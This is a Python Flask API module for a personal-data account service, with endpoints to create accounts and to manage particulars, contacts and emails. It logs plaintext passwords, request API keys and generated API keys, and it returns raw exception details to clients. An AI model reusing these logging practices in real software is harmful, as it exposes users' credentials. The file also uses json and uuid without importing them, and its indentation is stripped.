import bcrypt # https://github.com/pyca/bcrypt/, https://pypi.python.org/pypi/bcrypt/2.0.0
#from Crypto.Hash import SHA512
#from Crypto.Random.random import StrongRandom
from random import randint
# Import flask dependencies
from flask import Blueprint, render_template, make_response, flash, session, request
from flask.ext.login import login_user, login_required
from flask_restful import Resource, Api, reqparse
# Import the database object from the main app module
from app import db, api, login_manager, app
# Import services
from app.helpers import get_custom_logger, make_json_response, ApiError
from app.mod_account.controllers import get_particulars, get_particular, verify_account_id_match, \
update_particular, get_contacts, add_contact, get_contact, update_contact, get_emails, add_email, get_email, \
update_email, get_telephone, update_telephone, get_telephones, add_telephone, get_settings, add_setting, get_setting, \
update_setting, get_event_log, get_event_logs, get_slrs, get_slr, get_slsrs, get_slsr, get_cr, get_crs, get_csrs, \
get_csr, export_account
from app.mod_account.models import AccountSchema2, ParticularsSchema, ContactsSchema, ContactsSchemaForUpdate, \
EmailsSchema, EmailsSchemaForUpdate, TelephonesSchema, TelephonesSchemaForUpdate, SettingsSchema, \
SettingsSchemaForUpdate
from app.mod_api_auth.controllers import gen_account_api_key, requires_api_auth_user, provideApiKey
from app.mod_blackbox.controllers import gen_account_key
from app.mod_database.helpers import get_db_cursor
from app.mod_database.models import Account, LocalIdentityPWD, LocalIdentity, Salt, Particulars, Email
from app.mod_api_auth.controllers import get_account_id_by_api_key
mod_account_api = Blueprint('account_api', __name__, template_folder='templates')
# create logger with 'spam_application'
logger = get_custom_logger(__name__)
# Resources
class Accounts(Resource):
def post(self):
"""
Example JSON
{
"data": {
"type": "Account",
"attributes": {
'firstName': 'Erkki',
'lastName': 'Esimerkki',
'dateOfBirth': '2016-05-31',
'email': 'erkki.esimerkki@examlpe.org',
'username': 'testUser',
'password': 'Hello',
'acceptTermsOfService': 'True'
}
}
}
:return:
"""
try:
endpoint = str(api.url_for(self))
except Exception as exp:
endpoint = str(__name__)
# load JSON
json_data = request.get_json()
if not json_data:
error_detail = {'0': 'Set application/json as Content-Type', '1': 'Provide json payload'}
raise ApiError(code=400, title="No input data provided", detail=error_detail, source=endpoint)
else:
logger.debug("json_data: " + json.dumps(json_data))
# Validate payload content
schema = AccountSchema2()
schema_validation_result = schema.load(json_data)
# Check validation errors
if schema_validation_result.errors:
logger.error("Invalid payload")
raise ApiError(code=400, title="Invalid payload", detail=dict(schema_validation_result.errors), source=endpoint)
else:
logger.debug("JSON validation -> OK")
try:
username = json_data['data']['attributes']['username']
password = json_data['data']['attributes']['password']
firstName = json_data['data']['attributes']['firstName']
lastName = json_data['data']['attributes']['lastName']
email_address = json_data['data']['attributes']['email']
dateOfBirth = json_data['data']['attributes']['dateOfBirth']
acceptTermsOfService = json_data['data']['attributes']['acceptTermsOfService']
global_identifier = str(uuid.uuid4())
salt_str = str(bcrypt.gensalt())
pwd_hash = bcrypt.hashpw(str(password), salt_str)
except Exception as exp:
error_title = "Could not prepare Account data"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
# DB cursor
cursor = get_db_cursor()
try:
###
# Accounts
logger.debug('Accounts')
account = Account(global_identifyer=global_identifier)
account.to_db(cursor=cursor)
###
# localIdentityPWDs
logger.debug('localIdentityPWDs')
local_pwd = LocalIdentityPWD(password=pwd_hash)
local_pwd.to_db(cursor=cursor)
###
# localIdentities
logger.debug('localIdentities')
local_identity = LocalIdentity(
username=username,
pwd_id=local_pwd.id,
accounts_id=account.id
)
local_identity.to_db(cursor=cursor)
###
# salts
logger.debug('salts')
salt = Salt(
salt=salt_str,
identity_id=local_identity.id
)
salt.to_db(cursor=cursor)
###
# Particulars
logger.debug('particulars')
particulars = Particulars(
firstname=firstName,
lastname=lastName,
date_of_birth=dateOfBirth,
account_id=account.id
)
logger.debug("to_dict: " + repr(particulars.to_dict))
cursor = particulars.to_db(cursor=cursor)
###
# emails
logger.debug('emails')
email = Email(
email=email_address,
type="Personal",
prime=1,
account_id=account.id
)
email.to_db(cursor=cursor)
###
# Commit
db.connection.commit()
except Exception as exp:
error_title = "Could not create Account"
logger.debug('commit failed: ' + repr(exp))
logger.debug('--> rollback')
logger.error(error_title)
db.connection.rollback()
raise ApiError(code=500, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.debug('Account commited')
try:
logger.info("Generating Key for Account")
kid = gen_account_key(account_id=account.id)
except Exception as exp:
error_title = "Could not generate Key for Account"
logger.debug(error_title + ': ' + repr(exp))
#raise ApiError(code=500, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Generated Key for Account with Key ID: " + str(kid))
try:
logger.info("Generating API Key for Account")
api_key = gen_account_api_key(account_id=account.id)
except Exception as exp:
error_title = "Could not generate API Key for Account"
logger.debug(error_title + ': ' + repr(exp))
#raise ApiError(code=500, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Generated API Key: " + str(api_key))
data = cursor.fetchall()
logger.debug('data: ' + repr(data))
# Response data container
try:
response_data = {}
response_data['meta'] = {}
response_data['meta']['activationInstructions'] = "Account activated already"
response_data['data'] = {}
response_data['data']['type'] = "Account"
response_data['data']['id'] = str(account.id)
response_data['data']['attributes'] = json_data['data']['attributes']
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=201)
class AccountExport(Resource):
@requires_api_auth_user
def get(self, account_id):
logger.info("AccountExport")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Account Export
try:
logger.info("Exporting Account")
db_entries = export_account(account_id=account_id)
except Exception as exp:
error_title = "Account Export failed"
logger.error(error_title + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Account Export Succeed")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountParticulars(Resource):
@requires_api_auth_user
def get(self, account_id):
logger.info("AccountParticulars")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Particulars
try:
logger.info("Fetching Particulars")
db_entries = get_particulars(account_id=account_id)
except Exception as exp:
error_title = "No Particulars found"
logger.error(error_title + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Particulars Fetched")
logger.info("Particulars: ")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountParticular(Resource):
@requires_api_auth_user
def get(self, account_id, particulars_id):
logger.info("AccountParticulars")
try:
endpoint = str(api.url_for(self, account_id=account_id, particulars_id=particulars_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
particulars_id = str(particulars_id)
except Exception as exp:
error_title = "Unsupported particulars_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("particulars_id: " + particulars_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Particulars
try:
logger.info("Fetching Particulars")
db_entries = get_particular(account_id=account_id, id=particulars_id)
except Exception as exp:
error_title = "No Particulars found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Particulars Fetched")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
@requires_api_auth_user
def patch(self, account_id, particulars_id):
logger.info("AccountParticular")
try:
endpoint = str(api.url_for(self, account_id=account_id, particulars_id=particulars_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
particulars_id = str(particulars_id)
except Exception as exp:
error_title = "Unsupported particulars_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("particulars_id: " + particulars_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs from path and ApiKey are matching")
# load JSON from payload
json_data = request.get_json()
if not json_data:
error_detail = {'0': 'Set application/json as Content-Type', '1': 'Provide json payload'}
raise ApiError(code=400, title="No input data provided", detail=error_detail, source=endpoint)
else:
logger.debug("json_data: " + json.dumps(json_data))
# Validate payload content
schema = ParticularsSchema()
schema_validation_result = schema.load(json_data)
# Check validation errors
if schema_validation_result.errors:
logger.error("Invalid payload")
raise ApiError(code=400, title="Invalid payload", detail=dict(schema_validation_result.errors), source=endpoint)
else:
logger.debug("JSON validation -> OK")
try:
particulars_id_from_payload = json_data['data'].get("id", "")
except Exception as exp:
error_title = "Could not get id from payload"
logger.error(error_title)
raise ApiError(
code=404,
title=error_title,
detail=repr(exp),
source=endpoint
)
# Check if particulars_id from path and payload are matching
if particulars_id != particulars_id_from_payload:
error_title = "Particulars IDs from path and payload are not matching"
compared_ids = {'IdFromPath': particulars_id, 'IdFromPayload': particulars_id_from_payload}
logger.error(error_title + ", " + json.dumps(compared_ids))
raise ApiError(
code=403,
title=error_title,
detail=compared_ids,
source=endpoint
)
else:
logger.info("Particulars IDs from path and payload are matching")
# Collect data
try:
attributes = json_data['data']['attributes']
except Exception as exp:
error_title = "Could not collect data"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
# Update Particulars
try:
logger.info("Updating Particulars")
db_entries = update_particular(account_id=account_id, id=particulars_id, attributes=attributes)
except Exception as exp:
error_title = "No Particulars found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Particulars Updated")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountContacts(Resource):
@requires_api_auth_user
def get(self, account_id):
logger.info("AccountContacts")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Contacts
try:
logger.info("Fetching Contacts")
db_entries = get_contacts(account_id=account_id)
except Exception as exp:
error_title = "No Contacts found"
logger.error(error_title + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Contacts Fetched")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
@requires_api_auth_user
def post(self, account_id):
logger.info("AccountContacts")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs from path and ApiKey are matching")
# load JSON from payload
json_data = request.get_json()
if not json_data:
error_detail = {'0': 'Set application/json as Content-Type', '1': 'Provide json payload'}
raise ApiError(code=400, title="No input data provided", detail=error_detail, source=endpoint)
else:
logger.debug("json_data: " + json.dumps(json_data))
# Validate payload content
schema = ContactsSchema()
schema_validation_result = schema.load(json_data)
# Check validation errors
if schema_validation_result.errors:
logger.error("Invalid payload")
raise ApiError(code=400, title="Invalid payload", detail=dict(schema_validation_result.errors),
source=endpoint)
else:
logger.debug("JSON validation -> OK")
# Collect data
try:
attributes = json_data['data']['attributes']
except Exception as exp:
error_title = "Could not collect data"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
# Add Contact
try:
logger.info("Adding Contacts")
db_entries = add_contact(account_id=account_id, attributes=attributes)
except Exception as exp:
error_title = "Could not add Contact entry"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Contacts Updated")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=201)
class AccountContact(Resource):
@requires_api_auth_user
def get(self, account_id, contacts_id):
logger.info("AccountContact")
try:
endpoint = str(api.url_for(self, account_id=account_id, contacts_id=contacts_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
contacts_id = str(contacts_id)
except Exception as exp:
error_title = "Unsupported contacts_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("contacts_id: " + contacts_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Contacts
try:
logger.info("Fetching Contacts")
db_entries = get_contact(account_id=account_id, id=contacts_id)
except Exception as exp:
error_title = "No Contacts found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Contacts Fetched")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
@requires_api_auth_user
def patch(self, account_id, contacts_id): # TODO: Should be PATCH instead of PUT
logger.info("AccountContact")
try:
endpoint = str(api.url_for(self, account_id=account_id, contacts_id=contacts_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
contacts_id = str(contacts_id)
except Exception as exp:
error_title = "Unsupported contacts_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("contacts_id: " + contacts_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs from path and ApiKey are matching")
# load JSON from payload
json_data = request.get_json()
if not json_data:
error_detail = {'0': 'Set application/json as Content-Type', '1': 'Provide json payload'}
raise ApiError(code=400, title="No input data provided", detail=error_detail, source=endpoint)
else:
logger.debug("json_data: " + json.dumps(json_data))
# Validate payload content
schema = ContactsSchemaForUpdate()
schema_validation_result = schema.load(json_data)
# Check validation errors
if schema_validation_result.errors:
logger.error("Invalid payload")
raise ApiError(code=400, title="Invalid payload", detail=dict(schema_validation_result.errors), source=endpoint)
else:
logger.debug("JSON validation -> OK")
try:
contacts_id_from_payload = json_data['data'].get("id", "")
except Exception as exp:
error_title = "Could not get id from payload"
logger.error(error_title)
raise ApiError(
code=404,
title=error_title,
detail=repr(exp),
source=endpoint
)
# Check if contacts_id from path and payload are matching
if contacts_id != contacts_id_from_payload:
error_title = "Contact IDs from path and payload are not matching"
compared_ids = {'IdFromPath': contacts_id, 'IdFromPayload': contacts_id_from_payload}
logger.error(error_title + ", " + json.dumps(compared_ids))
raise ApiError(
code=403,
title=error_title,
detail=compared_ids,
source=endpoint
)
else:
logger.info("Contact IDs from path and payload are matching")
# Collect data
try:
attributes = json_data['data']['attributes']
except Exception as exp:
error_title = "Could not collect data"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
# Update Contact
try:
logger.info("Updating Contacts")
db_entries = update_contact(account_id=account_id, id=contacts_id, attributes=attributes)
except Exception as exp:
error_title = "No Contacts found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Contacts Updated")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountEmails(Resource):
@requires_api_auth_user
def get(self, account_id):
logger.info("AccountEmails")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Emails
try:
logger.info("Fetching Emails")
db_entries = get_emails(account_id=account_id)
except Exception as exp:
error_title = "No Emails found"
logger.error(error_title + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Emails Fetched")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
@requires_api_auth_user
def post(self, account_id):
logger.info("AccountEmails")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs from path and ApiKey are matching")
# load JSON from payload
json_data = request.get_json()
if not json_data:
error_detail = {'0': 'Set application/json as Content-Type', '1': 'Provide json payload'}
raise ApiError(code=400, title="No input data provided", detail=error_detail, source=endpoint)
else:
logger.debug("json_data: " + json.dumps(json_data))
# Validate payload content
schema = EmailsSchema()
schema_validation_result = schema.load(json_data)
# Check validation errors
if schema_validation_result.errors:
logger.error("Invalid payload")
raise ApiError(code=400, title="Invalid payload", detail=dict(schema_validation_result.errors),
source=endpoint)
else:
logger.debug("JSON validation -> OK")
# Collect data
try:
attributes = json_data['data']['attributes']
except Exception as exp:
error_title = "Could not collect data"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
# Add Email
try:
logger.info("Adding Email")
db_entries = add_email(account_id=account_id, attributes=attributes)
except Exception as exp:
error_title = "Could not add Email entry"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Email added")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=201)
class AccountEmail(Resource):
@requires_api_auth_user
def get(self, account_id, emails_id):
logger.info("AccountEmail")
try:
endpoint = str(api.url_for(self, account_id=account_id, emails_id=emails_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
emails_id = str(emails_id)
except Exception as exp:
error_title = "Unsupported emails_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("emails_id: " + emails_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Email
try:
logger.info("Fetching Email")
db_entries = get_email(account_id=account_id, id=emails_id)
except Exception as exp:
error_title = "No Email found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Email Fetched")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
@requires_api_auth_user
def patch(self, account_id, emails_id): # TODO: Should be PATCH instead of PUT
logger.info("AccountEmail")
try:
endpoint = str(api.url_for(self, account_id=account_id, emails_id=emails_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
emails_id = str(emails_id)
except Exception as exp:
error_title = "Unsupported emails_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("emails_id: " + emails_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs from path and ApiKey are matching")
# load JSON from payload
json_data = request.get_json()
if not json_data:
error_detail = {'0': 'Set application/json as Content-Type', '1': 'Provide json payload'}
raise ApiError(code=400, title="No input data provided", detail=error_detail, source=endpoint)
else:
logger.debug("json_data: " + json.dumps(json_data))
# Validate payload content
schema = EmailsSchemaForUpdate()
schema_validation_result = schema.load(json_data)
# Check validation errors
if schema_validation_result.errors:
logger.error("Invalid payload")
raise ApiError(code=400, title="Invalid payload", detail=dict(schema_validation_result.errors), source=endpoint)
else:
logger.debug("JSON validation -> OK")
try:
emails_id_from_payload = json_data['data'].get("id", "")
except Exception as exp:
error_title = "Could not get id from payload"
logger.error(error_title)
raise ApiError(
code=404,
title=error_title,
detail=repr(exp),
source=endpoint
)
# Check if emails_id from path and payload are matching
if emails_id != emails_id_from_payload:
error_title = "Email IDs from path and payload are not matching"
compared_ids = {'IdFromPath': emails_id, 'IdFromPayload': emails_id_from_payload}
logger.error(error_title + ", " + json.dumps(compared_ids))
raise ApiError(
code=403,
title=error_title,
detail=compared_ids,
source=endpoint
)
else:
logger.info("Email IDs from path and payload are matching")
# Collect data
try:
attributes = json_data['data']['attributes']
except Exception as exp:
error_title = "Could not collect data"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
# Update Email
try:
logger.info("Updating Emails")
db_entries = update_email(account_id=account_id, id=emails_id, attributes=attributes)
except Exception as exp:
# TODO: Error handling on more detailed level
error_title = "No Email found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Email Updated")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
